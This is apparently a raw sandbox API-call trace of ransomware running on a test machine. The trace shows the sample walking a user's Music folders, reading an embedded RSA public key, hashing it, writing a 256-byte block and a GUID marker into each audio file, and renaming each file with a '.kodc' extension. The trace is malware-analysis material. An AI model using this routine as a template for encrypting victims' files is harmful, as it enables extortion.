returned 0x32cec40 [0101.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81a8 [0101.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.813] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1826, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.813] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.813] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.813] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.814] CloseHandle (hObject=0x5cc) returned 1 [0101.819] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\rs3sb2G 3uKXzeiC9.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\rs3sb2g 3ukxzeic9.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\rs3sb2G 3uKXzeiC9.wav.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\rs3sb2g 3ukxzeic9.wav.kodc")) returned 1 [0101.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0101.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.820] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0101.821] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3cfa800, ftCreationTime.dwHighDateTime=0x1d5c4f9, ftLastAccessTime.dwLowDateTime=0xae7aff90, ftLastAccessTime.dwHighDateTime=0x1d5c428, ftLastWriteTime.dwLowDateTime=0xae7aff90, ftLastWriteTime.dwHighDateTime=0x1d5c428, nFileSizeHigh=0x0, nFileSizeLow=0xeed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_8eq_R6KO9bKaTf.wav", cAlternateFileName="_8EQ_R~1.WAV")) returned 1 [0101.821] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\_8eq_R6KO9bKaTf.wav") returned=".wav" [0101.821] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\_8eq_R6KO9bKaTf.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\_8eq_r6ko9bkatf.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.821] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=3821) returned 1 [0101.821] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.824] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xec7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.824] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.825] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.825] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xeed, lpOverlapped=0x0) returned 1 [0101.825] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.825] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.825] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.825] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.826] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.826] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.826] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.826] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.826] GetLastError () returned 0x0 [0101.826] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.826] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.826] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.827] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.827] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xef0) returned 0x9b9de98 [0101.827] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6430 [0101.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8160 [0101.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6478 [0101.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8178 [0101.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81a8 [0101.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81c0 [0101.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.827] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81a8 | out: hHeap=0x630000) returned 1 [0101.828] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xeed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.828] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.828] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.828] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.828] CloseHandle (hObject=0x5cc) returned 1 [0101.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x32d0db8 [0101.837] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\_8eq_R6KO9bKaTf.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\_8eq_r6ko9bkatf.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\_8eq_R6KO9bKaTf.wav.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jnspq9bvvowqr\\_8eq_r6ko9bkatf.wav.kodc")) returned 1 [0101.839] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3cfa800, ftCreationTime.dwHighDateTime=0x1d5c4f9, ftLastAccessTime.dwLowDateTime=0xae7aff90, ftLastAccessTime.dwHighDateTime=0x1d5c428, ftLastWriteTime.dwLowDateTime=0xae7aff90, ftLastWriteTime.dwHighDateTime=0x1d5c428, nFileSizeHigh=0x0, nFileSizeLow=0xeed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_8eq_R6KO9bKaTf.wav", cAlternateFileName="_8EQ_R~1.WAV")) returned 0 [0101.839] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0101.839] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0101.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dc90 [0101.839] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0101.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.839] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\") returned="vzirrPIdRoa4G1GJ\\" [0101.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0101.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318138 [0101.840] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0101.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6478 [0101.840] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0101.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.840] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0101.840] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0101.840] PathFindFileNameW (pszPath="") returned="" [0101.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.840] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14e70f70, ftCreationTime.dwHighDateTime=0x1d5be17, ftLastAccessTime.dwLowDateTime=0x7708e7a0, ftLastAccessTime.dwHighDateTime=0x1d5be49, ftLastWriteTime.dwLowDateTime=0x7708e7a0, ftLastWriteTime.dwHighDateTime=0x1d5be49, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0101.840] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14e70f70, ftCreationTime.dwHighDateTime=0x1d5be17, ftLastAccessTime.dwLowDateTime=0x7708e7a0, ftLastAccessTime.dwHighDateTime=0x1d5be49, ftLastWriteTime.dwLowDateTime=0x7708e7a0, ftLastWriteTime.dwHighDateTime=0x1d5be49, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.840] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x668f96b0, ftCreationTime.dwHighDateTime=0x1d5c3b9, ftLastAccessTime.dwLowDateTime=0xabdc100, ftLastAccessTime.dwHighDateTime=0x1d5bfa3, ftLastWriteTime.dwLowDateTime=0xabdc100, ftLastWriteTime.dwHighDateTime=0x1d5bfa3, nFileSizeHigh=0x0, nFileSizeLow=0x114d5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="28dTIfQ.m4a", cAlternateFileName="")) returned 1 [0101.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0101.840] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\28dTIfQ.m4a") returned=".m4a" [0101.840] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\28dTIfQ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzirrpidroa4g1gj\\28dtifq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.841] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=70869) returned 1 [0101.841] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.844] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x114af, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.844] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.845] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.845] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x114d5, lpOverlapped=0x0) returned 1 [0101.846] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.846] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.846] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.846] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.847] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.847] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.847] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.847] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.847] GetLastError () returned 0x0 [0101.847] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.847] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.848] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.848] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.848] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x114e0) returned 0x9bb8968 [0101.848] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6478 [0101.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8178 [0101.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb64c0 [0101.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8190 [0101.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81c0 [0101.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb81d8 [0101.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.849] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81c0 | out: hHeap=0x630000) returned 1 [0101.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb81d8 | out: hHeap=0x630000) returned 1 [0101.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 